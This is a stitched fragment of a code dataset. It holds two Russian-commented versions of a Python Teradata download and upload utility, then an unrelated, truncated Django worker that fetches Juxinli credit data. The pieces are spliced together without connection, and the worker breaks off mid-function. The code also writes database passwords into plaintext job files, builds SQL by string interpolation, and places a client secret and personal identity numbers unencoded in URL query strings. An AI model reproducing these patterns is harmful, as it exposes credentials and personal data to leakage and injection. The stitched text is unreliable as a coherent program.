f.write(config)\n\n\ndef td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',\n fast=False, return_df=False, csv=True, chunksize=100000):\n \"\"\"\n Функция возвращает данные из ТД: путь к csv или датафрейм.\n\n fast=True - использовать утилиты ТД, False - ODBC;\n return_df - вернуть датафрейм;\n csv - записать данные в файл при fast=False;\n chunksize - размер бача для ODBC;\n query должен содержать where, чтобы выгрузить название столбцов из БД\n\n \"\"\"\n local_seed = str(random.randint(0, 1000000))\n query = query.replace('\\n', ' ')\n if not fast:\n session = get_session(bd, username, password)\n frame = sql2df(query, session, chunksize=chunksize)\n session.close()\n if return_df:\n return frame\n else:\n 
path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if csv:\n filename = path_to_file + '.csv'\n frame.to_csv(filename, sep=';', index=False, encoding='utf8')\n return filename\n else:\n dump(frame, path_to_file)\n return path_to_file\n else:\n check_config()\n query = query.replace(\"'\", \"''\")\n path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n os.mkdir(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n path_to_file = os.path.join(path_to_folder, 'dataset.csv')\n open(path_to_file, 'w').close()\n txt = (\n \"\"\"SourceTdpId = '%s'\n ,SourceUserName = '%s' \n ,SourceUserPassword = '%s'\n ,DDLPrivateLogName = 'ddlprivate.log'\n ,ExportPrivateLogName = 'exportprivate.log'\n ,TargetErrorList = ['3807']\n ,TargetFileName = '%s'\n ,TargetFormat = 'delimited'\n ,TargetTextDelimiter = ';'\n ,TargetOpenMode = 'write'\n ,SelectStmt = '%s' \"\"\"\n % (bd, username, password, path_to_file, query))\n qtxt = \"\"\"USING CHAR SET UTF-8\n DEFINE JOB qstart2\n (\n APPLY TO OPERATOR ($FILE_WRITER)\n SELECT * FROM OPERATOR($EXPORT);\n );\"\"\"\n with open(path_to_folder + '/qstart2.txt', 'w+') as f:\n f.write(qtxt)\n with open(path_to_folder + '/jobvars.txt', 'w+') as f:\n f.write(txt)\n p = subprocess.run(shlex.split(\n f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'\n ), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n query = query.replace('\\n', ' ').replace(\"''\", \"'\")\n query = query.lower()\n query_list = query.split('where')\n if len(query_list) == 2:\n columns_query = ' where 1=0 and '.join(query_list)\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n else:\n print(\"Coudn't load columns names\")\n columns_names = None\n if not return_df:\n if columns_names:\n with open(path_to_folder + '/columns_names.txt', 
'w') as f:\n f.write('\\n'.join(columns_names))\n return path_to_file\n else:\n if columns_names:\n frame = pd.read_csv(path_to_file, names=columns_names,\n delimiter=';')\n else:\n frame = pd.read_csv(path_to_file, header=None, delimiter=';')\n return frame\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\ndef td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=\n '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=\n None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):\n \"\"\"\n Функция записывате данные в ТД через утилиты или ODBC\n\n \"\"\"\n table = schema + '.' + tbl_name\n if not fast:\n if not loadframe:\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=\n False)\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\n df_dict = df.to_dict('records')\n session = get_session(bd, username, password)\n for i in tqdm(range(n_iters), total=n_iters):\n session.executemany(\n f\"INSERT INTO {table} VALUES ({','.join(list('?' 
* df.shape[1]))})\"\n , [list(row.values()) for row in df_dict[i * batch_size:i *\n batch_size + batch_size]], batch=True)\n session.close()\n else:\n check_config()\n local_seed = str(random.randint(0, 1000000))\n path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n if loadframe:\n converted = df.replace(np.NaN, '').astype(str)\n path_to_file = path_to_folder + '/tmp.csv'\n converted.to_csv(path_to_file, index=False, header=False, sep=\n ';', encoding='utf8')\n converted_len = converted.apply(lambda x: x.str.encode('utf-8')\n .apply(len)).max().to_dict()\n else:\n converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',\n header=None, encoding='utf8', low_memory=False, nrows=100000)\n columns_query = f'select * from {table} where 1=0'\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n shutil.copy(path_to_file, path_to_folder + '/tmp.csv')\n converted_len.columns = columns_names\n converted_len = converted_len.apply(lambda x: x.str.encode(\n 'utf-8').apply(len)).max().to_dict()\n td_temp_table = table + '_tmp_' + local_seed\n session = get_session(bd, username, password)\n session.execute(\n f'create multiset table {td_temp_table} as {table} with no data no primary index'\n )\n session.close()\n txt = f\"\"\"USING CHARACTER SET UTF8\n DEFINE JOB teradata_upload\n Description 'Fastload script'\n (\n DEFINE OPERATOR Load_operator\n TYPE LOAD\n SCHEMA *\n ATTRIBUTES\n (\n VARCHAR TdPid='{bd}',\n VARCHAR UserName='{username}',\n VARCHAR UserPassWord='{password}',\n VARCHAR TargetTable='{td_temp_table}',\n VARCHAR LogTable='{schema}.usr_tpt_log',\n VARCHAR DateForm='AnsiDate',\n INTEGER MaxSessions={max_sessions}\n );\n\n DEFINE SCHEMA Define_Employee_Schema\n (\n {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in 
converted_len.items())} \n );\n\n DEFINE OPERATOR Producer_File_Detail\n TYPE DATACONNECTOR PRODUCER\n SCHEMA Define_Employee_Schema\n ATTRIBUTES\n (\n VARCHAR DirectoryPath='{path_to_folder}/'\n , VARCHAR FileName='tmp.csv'\n , VARCHAR TextDelimiter=';'\n , VARCHAR QuotedData = 'Optional'\n , VARCHAR OpenQuoteMark = '\"'\n , VARCHAR CloseQuoteMark = '\"'\n , VARCHAR Format='Delimited'\n , VARCHAR OpenMode='Read'\n , VARCHAR INDICATORMODE='N'\n , INTEGER BUFFERSIZE = {buffersize}\n );\n\n APPLY\n (\n 'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'\n )\n TO OPERATOR(Load_operator)\n\n SELECT * FROM OPERATOR (Producer_File_Detail);\n );\"\"\"\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\n f.write(txt)\n p = subprocess.Popen(shlex.split(\n f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))\n p.wait()\n print('Merging in Teradata... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'insert into {table} sel * from {td_temp_table}')\n session.close()\n print('Cleaning... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'drop table {td_temp_table}')\n session.close()\n shutil.rmtree(path_to_folder)\n print('Done!')\n",
"step-4": "import os\nimport numpy as np\nimport pandas as pd\nimport random\nimport platform\nimport subprocess\nimport shlex\nimport teradata\nfrom joblib import dump\nimport shutil\nfrom tqdm import tqdm\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\ndef td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',\n fast=False, return_df=False, csv=True, chunksize=100000):\n \"\"\"\n Функция возвращает данные из ТД: путь к csv или датафрейм.\n\n fast=True - использовать утилиты ТД, False - ODBC;\n return_df - вернуть датафрейм;\n csv - записать данные в файл при fast=False;\n chunksize - размер бача для ODBC;\n query должен содержать where, чтобы выгрузить название столбцов из БД\n\n \"\"\"\n local_seed = str(random.randint(0, 1000000))\n query = query.replace('\\n', 
' ')\n if not fast:\n session = get_session(bd, username, password)\n frame = sql2df(query, session, chunksize=chunksize)\n session.close()\n if return_df:\n return frame\n else:\n path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if csv:\n filename = path_to_file + '.csv'\n frame.to_csv(filename, sep=';', index=False, encoding='utf8')\n return filename\n else:\n dump(frame, path_to_file)\n return path_to_file\n else:\n check_config()\n query = query.replace(\"'\", \"''\")\n path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n os.mkdir(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n path_to_file = os.path.join(path_to_folder, 'dataset.csv')\n open(path_to_file, 'w').close()\n txt = (\n \"\"\"SourceTdpId = '%s'\n ,SourceUserName = '%s' \n ,SourceUserPassword = '%s'\n ,DDLPrivateLogName = 'ddlprivate.log'\n ,ExportPrivateLogName = 'exportprivate.log'\n ,TargetErrorList = ['3807']\n ,TargetFileName = '%s'\n ,TargetFormat = 'delimited'\n ,TargetTextDelimiter = ';'\n ,TargetOpenMode = 'write'\n ,SelectStmt = '%s' \"\"\"\n % (bd, username, password, path_to_file, query))\n qtxt = \"\"\"USING CHAR SET UTF-8\n DEFINE JOB qstart2\n (\n APPLY TO OPERATOR ($FILE_WRITER)\n SELECT * FROM OPERATOR($EXPORT);\n );\"\"\"\n with open(path_to_folder + '/qstart2.txt', 'w+') as f:\n f.write(qtxt)\n with open(path_to_folder + '/jobvars.txt', 'w+') as f:\n f.write(txt)\n p = subprocess.run(shlex.split(\n f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'\n ), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n query = query.replace('\\n', ' ').replace(\"''\", \"'\")\n query = query.lower()\n query_list = query.split('where')\n if len(query_list) == 2:\n columns_query = ' where 1=0 and '.join(query_list)\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n 
)\n session.close()\n else:\n print(\"Coudn't load columns names\")\n columns_names = None\n if not return_df:\n if columns_names:\n with open(path_to_folder + '/columns_names.txt', 'w') as f:\n f.write('\\n'.join(columns_names))\n return path_to_file\n else:\n if columns_names:\n frame = pd.read_csv(path_to_file, names=columns_names,\n delimiter=';')\n else:\n frame = pd.read_csv(path_to_file, header=None, delimiter=';')\n return frame\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\ndef td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=\n '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=\n None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):\n \"\"\"\n Функция записывате данные в ТД через утилиты или ODBC\n\n \"\"\"\n table = schema + '.' + tbl_name\n if not fast:\n if not loadframe:\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=\n False)\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\n df_dict = df.to_dict('records')\n session = get_session(bd, username, password)\n for i in tqdm(range(n_iters), total=n_iters):\n session.executemany(\n f\"INSERT INTO {table} VALUES ({','.join(list('?' 
* df.shape[1]))})\"\n , [list(row.values()) for row in df_dict[i * batch_size:i *\n batch_size + batch_size]], batch=True)\n session.close()\n else:\n check_config()\n local_seed = str(random.randint(0, 1000000))\n path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n if loadframe:\n converted = df.replace(np.NaN, '').astype(str)\n path_to_file = path_to_folder + '/tmp.csv'\n converted.to_csv(path_to_file, index=False, header=False, sep=\n ';', encoding='utf8')\n converted_len = converted.apply(lambda x: x.str.encode('utf-8')\n .apply(len)).max().to_dict()\n else:\n converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',\n header=None, encoding='utf8', low_memory=False, nrows=100000)\n columns_query = f'select * from {table} where 1=0'\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n shutil.copy(path_to_file, path_to_folder + '/tmp.csv')\n converted_len.columns = columns_names\n converted_len = converted_len.apply(lambda x: x.str.encode(\n 'utf-8').apply(len)).max().to_dict()\n td_temp_table = table + '_tmp_' + local_seed\n session = get_session(bd, username, password)\n session.execute(\n f'create multiset table {td_temp_table} as {table} with no data no primary index'\n )\n session.close()\n txt = f\"\"\"USING CHARACTER SET UTF8\n DEFINE JOB teradata_upload\n Description 'Fastload script'\n (\n DEFINE OPERATOR Load_operator\n TYPE LOAD\n SCHEMA *\n ATTRIBUTES\n (\n VARCHAR TdPid='{bd}',\n VARCHAR UserName='{username}',\n VARCHAR UserPassWord='{password}',\n VARCHAR TargetTable='{td_temp_table}',\n VARCHAR LogTable='{schema}.usr_tpt_log',\n VARCHAR DateForm='AnsiDate',\n INTEGER MaxSessions={max_sessions}\n );\n\n DEFINE SCHEMA Define_Employee_Schema\n (\n {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in 
converted_len.items())} \n );\n\n DEFINE OPERATOR Producer_File_Detail\n TYPE DATACONNECTOR PRODUCER\n SCHEMA Define_Employee_Schema\n ATTRIBUTES\n (\n VARCHAR DirectoryPath='{path_to_folder}/'\n , VARCHAR FileName='tmp.csv'\n , VARCHAR TextDelimiter=';'\n , VARCHAR QuotedData = 'Optional'\n , VARCHAR OpenQuoteMark = '\"'\n , VARCHAR CloseQuoteMark = '\"'\n , VARCHAR Format='Delimited'\n , VARCHAR OpenMode='Read'\n , VARCHAR INDICATORMODE='N'\n , INTEGER BUFFERSIZE = {buffersize}\n );\n\n APPLY\n (\n 'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'\n )\n TO OPERATOR(Load_operator)\n\n SELECT * FROM OPERATOR (Producer_File_Detail);\n );\"\"\"\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\n f.write(txt)\n p = subprocess.Popen(shlex.split(\n f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))\n p.wait()\n print('Merging in Teradata... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'insert into {table} sel * from {td_temp_table}')\n session.close()\n print('Cleaning... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'drop table {td_temp_table}')\n session.close()\n shutil.rmtree(path_to_folder)\n print('Done!')\n",
"step-5": "import os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport platform\r\nimport subprocess\r\nimport shlex\r\nimport teradata\r\nfrom joblib import dump\r\nimport shutil\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef get_session(db, usr, pwd):\r\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\r\n\r\n if platform.system() == 'Windows':\r\n driver = 'Teradata'\r\n else:\r\n driver = 'Teradata Database ODBC Driver 16.20'\r\n\r\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1', logConsole=False)\r\n session = udaExec.connect(method='odbc',\r\n system=db, # Сервер ТД из файла\r\n username=usr, # Логин TD\r\n password=pwd, # Пароль TD\r\n driver = driver,\r\n charset='UTF8',\r\n autoCommit='True',\r\n USEREGIONALSETTINGS='N',\r\n transactionMode = 'TERADATA'\r\n )\r\n return session\r\n\r\n\r\ndef sql2df(query, session, chunksize=100000):\r\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\r\n db = pd.read_sql(query, session, chunksize=chunksize)\r\n data = pd.DataFrame()\r\n for x in tqdm(db):\r\n data = pd.concat([data, x])\r\n return data\r\n\r\n\r\ndef check_config():\r\n \"\"\" .twbcfg.ini to root path \"\"\"\r\n path = os.path.expanduser(\"~\")\r\n config_path = os.path.join(path, \".twbcfg.ini\")\r\n log_path = os.path.join(path, \"tmp\", \"teradata_logs\")\r\n\r\n if not os.path.exists(config_path):\r\n if not os.path.exists(log_path):\r\n os.mkdir(log_path)\r\n config = f'''CheckpointDirectory='{log_path}' \r\n LogDirectory='{log_path}' '''\r\n with open(config_path, 'w') as f:\r\n f.write(config)\r\n\r\n\r\n\r\ndef td_download(query=\"\",\r\n bd=\"tdsb15.cgs.sbrf.ru\",\r\n username=\"\", password=\"\",\r\n fast=False, return_df=False, csv=True,\r\n chunksize=100000):\r\n \"\"\"\r\n Функция возвращает данные из ТД: путь к csv или датафрейм.\r\n\r\n fast=True - использовать утилиты ТД, False - ODBC;\r\n return_df - вернуть датафрейм;\r\n csv - записать 
данные в файл при fast=False;\r\n chunksize - размер бача для ODBC;\r\n query должен содержать where, чтобы выгрузить название столбцов из БД\r\n\r\n \"\"\"\r\n local_seed = str(random.randint(0, 1000000))\r\n query = query.replace(\"\\n\", \" \")\r\n\r\n if not fast:\r\n # Teradata python package\r\n session = get_session(bd, username, password)\r\n frame = sql2df(query, session, chunksize=chunksize)\r\n session.close()\r\n if return_df:\r\n return frame\r\n else:\r\n path_to_file = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)\r\n if csv:\r\n filename = path_to_file + \".csv\"\r\n frame.to_csv(filename, sep=';', index=False, encoding=\"utf8\")\r\n return filename\r\n else:\r\n dump(frame, path_to_file)\r\n return path_to_file\r\n else:\r\n # FastLoad\r\n check_config()\r\n query = query.replace(\"'\", \"''\") # prepair query for FastLoad\r\n path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)\r\n\r\n if os.path.exists(path_to_folder):\r\n shutil.rmtree(path_to_folder)\r\n os.mkdir(path_to_folder)\r\n else:\r\n os.mkdir(path_to_folder)\r\n\r\n path_to_file = os.path.join(path_to_folder, 'dataset.csv')\r\n open(path_to_file, 'w').close()\r\n\r\n # Create utility files\r\n txt = '''SourceTdpId = '%s'\r\n ,SourceUserName = '%s' \r\n ,SourceUserPassword = '%s'\r\n ,DDLPrivateLogName = 'ddlprivate.log'\r\n ,ExportPrivateLogName = 'exportprivate.log'\r\n ,TargetErrorList = ['3807']\r\n ,TargetFileName = '%s'\r\n ,TargetFormat = 'delimited'\r\n ,TargetTextDelimiter = ';'\r\n ,TargetOpenMode = 'write'\r\n ,SelectStmt = '%s' ''' % (bd, username, password, path_to_file, query)\r\n qtxt = '''USING CHAR SET UTF-8\r\n DEFINE JOB qstart2\r\n (\r\n APPLY TO OPERATOR ($FILE_WRITER)\r\n SELECT * FROM OPERATOR($EXPORT);\r\n );'''\r\n with open(path_to_folder + '/qstart2.txt', 'w+') as f:\r\n f.write(qtxt)\r\n with open(path_to_folder + '/jobvars.txt', 'w+') as f:\r\n f.write(txt)\r\n # run FastLoad\r\n# p = subprocess.Popen(\r\n# 
shlex.split(f\"tbuild -f {path_to_folder}/qstart2.txt -v {path_to_folder}/jobvars.txt -j qstart2\")\r\n# )\r\n# p.wait()\r\n p = subprocess.run(\r\n shlex.split(f\"tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}\"), stdout=subprocess.PIPE, stderr=subprocess.STDOUT\r\n )\r\n\r\n # columns names\r\n query = query.replace(\"\\n\", \" \").replace(\"''\",\"'\")\r\n query = query.lower()\r\n query_list = query.split(\"where\")\r\n if len(query_list) == 2:\r\n columns_query = \" where 1=0 and \".join(query_list)\r\n session = get_session(bd, username, password)\r\n columns_names = pd.read_sql(columns_query, session).columns.tolist()\r\n session.close()\r\n else:\r\n print(\"Coudn't load columns names\")\r\n columns_names = None\r\n\r\n if not return_df:\r\n if columns_names:\r\n with open(path_to_folder + '/columns_names.txt', 'w') as f:\r\n f.write(\"\\n\".join(columns_names))\r\n return path_to_file\r\n else:\r\n if columns_names:\r\n frame = pd.read_csv(path_to_file, names=columns_names, delimiter=';')\r\n else:\r\n frame = pd.read_csv(path_to_file, header=None, delimiter=';')\r\n return frame\r\n\r\n\r\ndef py2td(x):\r\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\r\n x_type = type(x)\r\n if x_type == float:\r\n if x % 1 == 0:\r\n return int(x)\r\n else:\r\n return x\r\n elif x == 'null':\r\n return None\r\n else:\r\n return x\r\n\r\n\r\ndef td_import(\r\n username=\"\", password=\"\",\r\n bd=\"tdsb15.cgs.sbrf.ru\", tbl_name=\"\",\r\n schema=\"SBX_RETAIL_MP_PFM\",\r\n loadframe=True, df=None, path_to_file=None, fast=False,\r\n batch_size=12000, max_sessions=6, buffersize=524288,\r\n):\r\n \"\"\"\r\n Функция записывате данные в ТД через утилиты или ODBC\r\n\r\n \"\"\"\r\n table = schema + \".\" + tbl_name\r\n if not fast:\r\n if not loadframe:\r\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=False)\r\n # insert\r\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\r\n 
df_dict = df.to_dict('records')\r\n session = get_session(bd, username, password)\r\n for i in tqdm(range(n_iters), total=n_iters):\r\n session.executemany(\r\n f\"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})\",\r\n [list(row.values()) for row in df_dict[i * batch_size:i * batch_size + batch_size]],\r\n batch=True\r\n )\r\n session.close()\r\n else:\r\n check_config()\r\n local_seed = str(random.randint(0, 1000000))\r\n path_to_folder = os.path.join(os.getcwd(), \"data\", \"output_\" + local_seed)\r\n\r\n if os.path.exists(path_to_folder):\r\n shutil.rmtree(path_to_folder)\r\n else:\r\n os.mkdir(path_to_folder)\r\n\r\n if loadframe:\r\n converted = df.replace(np.NaN, '').astype(str)\r\n path_to_file = path_to_folder + '/tmp.csv'\r\n converted.to_csv(path_to_file, index=False, header=False, sep=\";\", encoding=\"utf8\")\r\n converted_len = converted.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()\r\n else:\r\n converted_len = pd.read_csv(path_to_file, sep=';', dtype=\"str\", header=None, encoding=\"utf8\",\r\n low_memory=False, nrows=100000)\r\n columns_query = f\"select * from {table} where 1=0\"\r\n session = get_session(bd, username, password)\r\n columns_names = pd.read_sql(columns_query, session).columns.tolist()\r\n session.close()\r\n shutil.copy(path_to_file, path_to_folder + \"/tmp.csv\") # cp file for correct working Change to move&\r\n\r\n converted_len.columns = columns_names\r\n converted_len = converted_len.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()\r\n\r\n # create empty tmp table\r\n td_temp_table = table + \"_tmp_\" + local_seed # change schema\r\n session = get_session(bd, username, password)\r\n session.execute(\r\n f\"create multiset table {td_temp_table} as {table} with no data no primary index\"\r\n )\r\n session.close()\r\n # Create utility file\r\n txt = f\"\"\"USING CHARACTER SET UTF8\r\n DEFINE JOB teradata_upload\r\n Description 'Fastload script'\r\n (\r\n DEFINE OPERATOR 
Load_operator\r\n TYPE LOAD\r\n SCHEMA *\r\n ATTRIBUTES\r\n (\r\n VARCHAR TdPid='{bd}',\r\n VARCHAR UserName='{username}',\r\n VARCHAR UserPassWord='{password}',\r\n VARCHAR TargetTable='{td_temp_table}',\r\n VARCHAR LogTable='{schema}.usr_tpt_log',\r\n VARCHAR DateForm='AnsiDate',\r\n INTEGER MaxSessions={max_sessions}\r\n );\r\n\r\n DEFINE SCHEMA Define_Employee_Schema\r\n (\r\n {','.join(f'{key} VARCHAR({max(1, value*2)})' for key, value in converted_len.items())} \r\n );\r\n\r\n DEFINE OPERATOR Producer_File_Detail\r\n TYPE DATACONNECTOR PRODUCER\r\n SCHEMA Define_Employee_Schema\r\n ATTRIBUTES\r\n (\r\n VARCHAR DirectoryPath='{path_to_folder}/'\r\n , VARCHAR FileName='tmp.csv'\r\n , VARCHAR TextDelimiter=';'\r\n , VARCHAR QuotedData = 'Optional'\r\n , VARCHAR OpenQuoteMark = '\"'\r\n , VARCHAR CloseQuoteMark = '\"'\r\n , VARCHAR Format='Delimited'\r\n , VARCHAR OpenMode='Read'\r\n , VARCHAR INDICATORMODE='N'\r\n , INTEGER BUFFERSIZE = {buffersize}\r\n );\r\n\r\n APPLY\r\n (\r\n 'INSERT INTO {td_temp_table}({','.join(\r\n f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(\r\n f'{key}' for key, value in converted_len.items())});'\r\n )\r\n TO OPERATOR(Load_operator)\r\n\r\n SELECT * FROM OPERATOR (Producer_File_Detail);\r\n );\"\"\"\r\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\r\n f.write(txt)\r\n # Start TPT load\r\n p = subprocess.Popen(\r\n shlex.split(f\"tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}\")\r\n )\r\n p.wait()\r\n # Merge\r\n print(\"Merging in Teradata... \\r\", end='', flush=True)\r\n session = get_session(bd, username, password)\r\n session.execute(f\"insert into {table} sel * from {td_temp_table}\")\r\n session.close()\r\n # Drop temporary table\r\n print(\"Cleaning... \\r\", end='', flush=True)\r\n session = get_session(bd, username, password)\r\n session.execute(f\"drop table {td_temp_table}\")\r\n session.close()\r\n # Cleanup\r\n shutil.rmtree(path_to_folder)\r\n print(\"Done!\")\r\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
import urllib2, json, traceback
from django.conf import settings
from django.db import models
from TkManager.order.models import User
from TkManager.juxinli.models import *
from TkManager.juxinli.error_no import *
from TkManager.common.tk_log import TkLog
from datetime import datetime
from django_gearman_commands import GearmanWorkerBaseCommand
from django.db import transaction
import objgraph
class JuxinliBaseCommand(GearmanWorkerBaseCommand):
"""
从聚信力获取json数据,然后把数据存入数据库
init_config 配置数据的存储方式,需要子类自己实现 配置文件格式参看注释
get_juxinli_data 执行解析存储操作
"""
def __init__(self):
super(JuxinliBaseCommand, self).__init__()
self._org_name = settings.JUXINLI_CONF['org_name']
self._client_secret = settings.JUXINLI_CONF['client_secret']
self._access_report_data_api = settings.JUXINLI_CONF['access_report_data_api']
self._access_raw_data_api = settings.JUXINLI_CONF['access_raw_data_api']
self._access_report_token_api = settings.JUXINLI_CONF['access_report_token_api']
self._access_e_business_raw_data_api = settings.JUXINLI_CONF['access_e_business_raw_data_api']
self._options = {
'update_days' : 21,
'force_update' : False,
}
self.init_config()
def init_config():
'''
参考格式:
self._transformer = {
'basic_transformer' : {
'name' : 'PhoneBasic', # django的Model类名称
'path' : 'raw_data/members/transactions:0/basic', #json数据的路径
'data_type' : 'map', # 数据的类型如果是单条就是map,如果是多条就是list
'version' : True, # 是否使用版本控制,如果是真那么每次拉数据会新增版本号,否则都用版本1
'trans' : { #数据的转化格式 source_field(json) -> dest_field(db model)
"cell_phone": "cell_phone",
"idcard": "idcard",
"real_name": "real_name",
"reg_time": "reg_time",
"update_time": "update_time",
"receiver" : { #如果是外键就用一个嵌套的格式来表示 (嵌套就没必要再用path定位了吧,默认就是当前路径)
"name" : "Receiver"
"req_call_cnt/data_type" : "list"
"version" : True,
"trans": {
"name" : "name",
"phone_num_list" : "phone_num_list",
"amount" : "amount",
"count" : "count",
},
},
},
},
}
'''
pass
def test(self,user,data):
if not data:
return ERR_GET_RAW_DATA_FAILED
ret_code = self._save_raw_data(data, user, self._options)
return ret_code
def get_juxinli_data(self, uid, url):
try:
user = User.objects.get(pk=uid)
token = self._get_token()
if not token:
return ERR_CREATE_TOKEN_FAILED
data = self._get_juxinli_data(token, user, url)
if not data:
return ERR_GET_RAW_DATA_FAILED
ret_code = self._save_raw_data(data, user, self._options)
if ret_code != 0:
return ret_code
#data = self._get_report_data(token, user)
#print data
#print "@@ print ret", ret_code
return RETURN_SUCCESS
except Exception, e:
traceback.print_exc()
TkLog().error("get juxinli call failed %s" % str(e))
return ERR_OTHER_EXCEPTION
def _open_url(self, url):
'''
get http request return json
'''
req1 = urllib2.Request(url=url)
html = urllib2.urlopen(req1).read().decode('utf-8')
return json.loads(html.encode("utf-8"))
def _get_token(self):
'''
生成一个新的用来获取数据的token 失败返回None
'''
url = u"%s?client_secret=%s&hours=24&org_name=%s" % (self._access_report_token_api, self._client_secret, self._org_name)
html = self._open_url(url)
#if
try:
res = html['access_token']
return res
except KeyError, e:
return None
def _get_juxinli_data(self, access_token, user, url):
'''
获取聚信力数据 返回json
'''
raw_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (url, self._client_secret, access_token, user.name, user.id_no, user.phone_no)
#print raw_url
try:
res = self._open_url(raw_url.encode('utf-8'))
# print res
# print res['raw_data']['members']['error_msg']
